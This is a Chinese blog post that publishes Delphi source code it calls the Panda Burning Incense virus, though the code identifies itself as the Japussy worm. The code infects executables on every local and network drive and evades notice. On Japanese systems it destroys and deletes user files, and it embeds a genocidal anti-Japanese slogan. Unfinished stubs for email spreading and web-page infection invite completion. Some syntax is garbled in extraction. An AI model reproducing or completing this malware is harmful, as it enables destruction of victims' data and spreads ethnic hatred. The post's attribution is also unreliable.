熊猫烧香病毒源代码

    技术2022-05-11  85

    最近肆虐网上的病毒熊猫烧香, 让我们一起看看它的真面目吧:

    源代码如下:

    //Delphi编写

    program Japussy;usesWindows, SysUtils, Classes, Graphics, ShellAPI {, Registry} ; const HeaderSize  =   82432 ;              // 病毒体的大小 IconOffset  =  $12EB8;            // PE文件主图标的偏移量 // 在我的Delphi5 SP1上面编译得到的大小,其它版本的Delphi可能不同 // 查找2800000020的十六进制字符串可以找到主图标的偏移量    {HeaderSize = 38912;             //Upx压缩过病毒体的大小IconOffset = $92BC;             //Upx压缩过PE文件主图标的偏移量//Upx 1.24W 用法: upx -9 --8086 Japussy.exe} IconSize    =  $2E8;              // PE文件主图标的大小--744字节 IconTail    =  IconOffset  +  IconSize;  // PE文件主图标的尾部 ID        =  $ 44444444 ;          // 感染标记 // 垃圾码,以备写入 Catchword  =   ' If a race need to be killed out, it must be Yamato.  '   +          ' If a country need to be destroyed, it must be Japan!  '   +          ' *** W32.Japussy.Worm.A *** ' ; {$R *.RES} function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer; stdcall; external  ' Kernel32.dll ' // 函数声明 varTmpFile:  string ;Si:     STARTUPINFO;Pi:     PROCESS_INFORMATION;IsJap:   Boolean  =  False;  // 日文操作系统标记 { 判断是否为Win9x } function IsWin9x: Boolean;varVer: TOSVersionInfo;beginResult : =  False;Ver.dwOSVersionInfoSize : =  SizeOf(TOSVersionInfo); if  not GetVersionEx(Ver) then  Exit; if  (Ver.dwPlatformID  =  VER_PLATFORM_WIN32_WINDOWS) then  // Win9x   Result : =  True;end; { 在流之间复制 } procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream;dStartPos: Integer; Count: Integer);varsCurPos, dCurPos: Integer;beginsCurPos : =  Src.Position;dCurPos : =  Dst.Position;Src.Seek(sStartPos,  0 );Dst.Seek(dStartPos,  0 );Dst.CopyFrom(Src, Count);Src.Seek(sCurPos,  0 );Dst.Seek(dCurPos,  0 );end; { 将宿主文件从已感染的PE文件中分离出来,以备使用 } procedure ExtractFile(FileName:  string );varsStream, dStream: TFileStream;begin try   sStream : =  TFileStream.Create(ParamStr( 0 ), fmOpenRead or fmShareDenyNone);   try     dStream : =  TFileStream.Create(FileName, fmCreate);     try     sStream.Seek(HeaderSize,  0 );  // 跳过头部的病毒部分     dStream.CopyFrom(sStream, sStream.Size  -  HeaderSize);     finally     dStream.Free;    end;   finally     sStream.Free;  end;exceptend;end; { 填充STARTUPINFO结构 } procedure FillStartupInfo(var Si: STARTUPINFO; State: Word);beginSi.cb : =  SizeOf(Si);Si.lpReserved : =  nil;Si.lpDesktop : =  nil;Si.lpTitle : =  nil;Si.dwFlags : =  STARTF_USESHOWWINDOW;Si.wShowWindow : =  State;Si.cbReserved2 : =   0 ;Si.lpReserved2 : =  nil;end; { 发带毒邮件 } procedure SendMail;begin // 哪位仁兄愿意完成之? end; { 感染PE文件 } procedure InfectOneFile(FileName:  string );varHdrStream, SrcStream: TFileStream;IcoStream, DstStream: TMemoryStream;iID: LongInt;aIcon: TIcon;Infected, IsPE: Boolean;i: Integer;Buf: array[ 0 .. 1 ] of Char;begin try   // 出错则文件正在被使用,退出    if  CompareText(FileName,  ' JAPUSSY.EXE ' =   0  then  // 是自己则不感染     Exit;  Infected : =  False;  IsPE   : =  False;  SrcStream : =  TFileStream.Create(FileName, fmOpenRead);   try      for  i : =   0  to $ 108   do   // 检查PE文件头     begin    SrcStream.Seek(i, soFromBeginning);    SrcStream.Read(Buf,  2 );     if  (Buf[ 0 =  # 80 ) and (Buf[ 1 =  # 69 ) then  // PE标记     begin      IsPE : =  True;  // 是PE文件       Break;    end;    end;    SrcStream.Seek( - 4 , soFromEnd);  // 检查感染标记     SrcStream.Read(iID,  4 );     if  (iID  =  ID) or (SrcStream.Size  <   10240 ) then  // 太小的文件不感染     Infected : =  True;   finally     SrcStream.Free;  end;   if  Infected or (not IsPE) then  // 如果感染过了或不是PE文件则退出     Exit;  IcoStream : =  TMemoryStream.Create;  DstStream : =  TMemoryStream.Create;   try     aIcon : =  TIcon.Create;     try      // 得到被感染文件的主图标(744字节),存入流     aIcon.ReleaseHandle;    aIcon.Handle : =  ExtractIcon(HInstance, PChar(FileName),  0 );    aIcon.SaveToStream(IcoStream);     finally     aIcon.Free;    end;    SrcStream : =  TFileStream.Create(FileName, fmOpenRead);     // 头文件     HdrStream : =  TFileStream.Create(ParamStr( 0 ), fmOpenRead or fmShareDenyNone);     try      // 写入病毒体主图标之前的数据     CopyStream(HdrStream,  0 , DstStream,  0 , IconOffset);     // 写入目前程序的主图标     CopyStream(IcoStream,  22 , DstStream, IconOffset, IconSize);     // 写入病毒体主图标到病毒体尾部之间的数据     CopyStream(HdrStream, IconTail, DstStream, IconTail, HeaderSize  -  IconTail);     // 写入宿主程序     CopyStream(SrcStream,  0 , DstStream, HeaderSize, SrcStream.Size);     // 写入已感染的标记     DstStream.Seek( 0 2 );    iID : =  $ 44444444 ;    DstStream.Write(iID,  4 );     finally     HdrStream.Free;    end;   finally     SrcStream.Free;    IcoStream.Free;    DstStream.SaveToFile(FileName);  // 替换宿主文件     DstStream.Free;  end;except;end;end; { 将目标文件写入垃圾码后删除 } procedure SmashFile(FileName:  string );varFileHandle: Integer;i, Size, Mass, Max, Len: Integer;begin try   SetFileAttributes(PChar(FileName),  0 );  // 去掉只读属性   FileHandle : =  FileOpen(FileName, fmOpenWrite);  // 打开文件    try     Size : =  GetFileSize(FileHandle, nil);  // 文件大小     i : =   0 ;    Randomize;    Max : =  Random( 15 );  // 写入垃圾码的随机次数      if  Max  <   5  then    Max : =   5 ;    Mass : =  Size div Max;  // 每个间隔块的大小     Len : =  Length(Catchword);     while  i  <  Max  do     begin    FileSeek(FileHandle, i  *  Mass,  0 );  // 定位     // 写入垃圾码,将文件彻底破坏掉     FileWrite(FileHandle, Catchword, Len);    Inc(i);    end;   finally     FileClose(FileHandle);  // 关闭文件   end;  DeleteFile(PChar(FileName));  // 删除之 exceptend;end; { 获得可写的驱动器列表 } function GetDrives:  string ;varDiskType: Word;D: Char;Str:  string ;i: Integer;begin for  i : =   0  to  25   do   // 遍历26个字母 begin  D : =  Chr(i  +   65 );  Str : =  D  +   ' :';   DiskType : =  GetDriveType(PChar(Str));   // 得到本地磁盘和网络盘    if  (DiskType  =  DRIVE_FIXED) or (DiskType  =  DRIVE_REMOTE) then    Result : =  Result  +  D;end;end; { 遍历目录,感染和摧毁文件 } procedure LoopFiles(Path, Mask:  string );vari, Count: Integer;Fn, Ext:  string ;SubDir: TStrings;SearchRec: TSearchRec;Msg: TMsg;function IsValidDir(SearchRec: TSearchRec): Integer;begin   if  (SearchRec.Attr  <>   16 ) and (SearchRec.Name  <>   ' . ' ) and    (SearchRec.Name  <>   ' .. ' ) then    Result : =   0   // 不是目录    else   if  (SearchRec.Attr  =   16 ) and (SearchRec.Name  <>   ' . ' ) and    (SearchRec.Name  <>   ' .. ' ) then    Result : =   1   // 不是根目录    else  Result : =   2 // 是根目录 end;begin if  (FindFirst(Path  +  Mask, faAnyFile, SearchRec)  =   0 ) thenbegin  repeat    PeekMessage(Msg,  0 0 0 , PM_REMOVE);  // 调整消息队列,避免引起怀疑      if  IsValidDir(SearchRec)  =   0  then    begin    Fn : =  Path  +  SearchRec.Name;    Ext : =  UpperCase(ExtractFileExt(Fn));     if  (Ext  =   ' .EXE ' ) or (Ext  =   ' .SCR ' ) then    begin      InfectOneFile(Fn);  // 感染可执行文件          end     else   if  (Ext  =   ' .HTM ' ) or (Ext  =   ' .HTML ' ) or (Ext  =   ' .ASP ' ) then    begin       // 感染HTML和ASP文件,将Base64编码后的病毒写入       // 感染浏览此网页的所有用户       // 哪位大兄弟愿意完成之?     end     else   if  Ext  =   ' .WAB '  then  // Outlook地址簿文件     begin       // 获取Outlook邮件地址     end     else   if  Ext  =   ' .ADC '  then  // Foxmail地址自动完成文件     begin       // 获取Foxmail邮件地址     end     else   if  Ext  =   ' IND '  then  // Foxmail地址簿文件     begin       // 获取Foxmail邮件地址     end     else      begin       if  IsJap then  // 是倭文操作系统       begin         if  (Ext  =   ' .DOC ' ) or (Ext  =   ' .XLS ' ) or (Ext  =   ' .MDB ' ) or        (Ext  =   ' .MP3 ' ) or (Ext  =   ' .RM ' ) or (Ext  =   ' .RA ' ) or        (Ext  =   ' .WMA ' ) or (Ext  =   ' .ZIP ' ) or (Ext  =   ' .RAR ' ) or        (Ext  =   ' .MPEG ' ) or (Ext  =   ' .ASF ' ) or (Ext  =   ' .JPG ' ) or        (Ext  =   ' .JPEG ' ) or (Ext  =   ' .GIF ' ) or (Ext  =   ' .SWF ' ) or        (Ext  =   ' .PDF ' ) or (Ext  =   ' .CHM ' ) or (Ext  =   ' .AVI ' ) then          SmashFile(Fn);  // 摧毁文件       end;    end;    end;     // 感染或删除一个文件后睡眠200毫秒,避免CPU占用率过高引起怀疑     Sleep( 200 );  until (FindNext(SearchRec)  <>   0 );end;FindClose(SearchRec);SubDir : =  TStringList.Create; if  (FindFirst(Path  +   ' *.* ' , faDirectory, SearchRec)  =   0 ) thenbegin  repeat     if  IsValidDir(SearchRec)  =   1  then    SubDir.Add(SearchRec.Name);  until (FindNext(SearchRec)  <>   0 );  end;FindClose(SearchRec);Count : =  SubDir.Count  -   1 ; for  i : =   0  to Count  do   LoopFiles(Path  +  SubDir.Strings  +   ' ', Mask); FreeAndNil(SubDir);end; { 遍历磁盘上所有的文件 } procedure InfectFiles;varDriverList:  string ;i, Len: Integer;begin if  GetACP  =   932  then  // 日文操作系统   IsJap : =  True;  // 去死吧! DriverList : =  GetDrives;  // 得到可写的磁盘列表 Len : =  Length(DriverList); while  True  do   // 死循环 begin   for  i : =  Len downto  1   do   // 遍历每个磁盘驱动器     LoopFiles(DriverList  +   ' :',  ' * . * ' ); //感染之   SendMail;  // 发带毒邮件   Sleep( 1000   *   60   *   5 );  // 睡眠5分钟 end;end; { 主程序开始 } begin if  IsWin9x then  // 是Win9x   RegisterServiceProcess(GetCurrentProcessID,  1 // 注册为服务进程 else   // WinNT begin   // 远程线程映射到Explorer进程   // 哪位兄台愿意完成之? end; // 如果是原始病毒体自己 if  CompareText(ExtractFileName(ParamStr( 0 )),  ' Japussy.exe ' =   0  then  InfectFiles  // 感染和发邮件 else   // 已寄生于宿主程序上了,开始工作 begin  TmpFile : =  ParamStr( 0 );  // 创建临时文件   Delete(TmpFile, Length(TmpFile)  -   4 4 );  TmpFile : =  TmpFile  +  # 32   +   ' .exe ' // 真正的宿主文件,多一个空格   ExtractFile(TmpFile);  // 分离之   FillStartupInfo(Si, SW_SHOWDEFAULT);  CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True,     0 , nil,  ' . ' , Si, Pi);  // 创建新进程运行之   InfectFiles;  // 感染和发邮件 end;end.

    最新回复(0)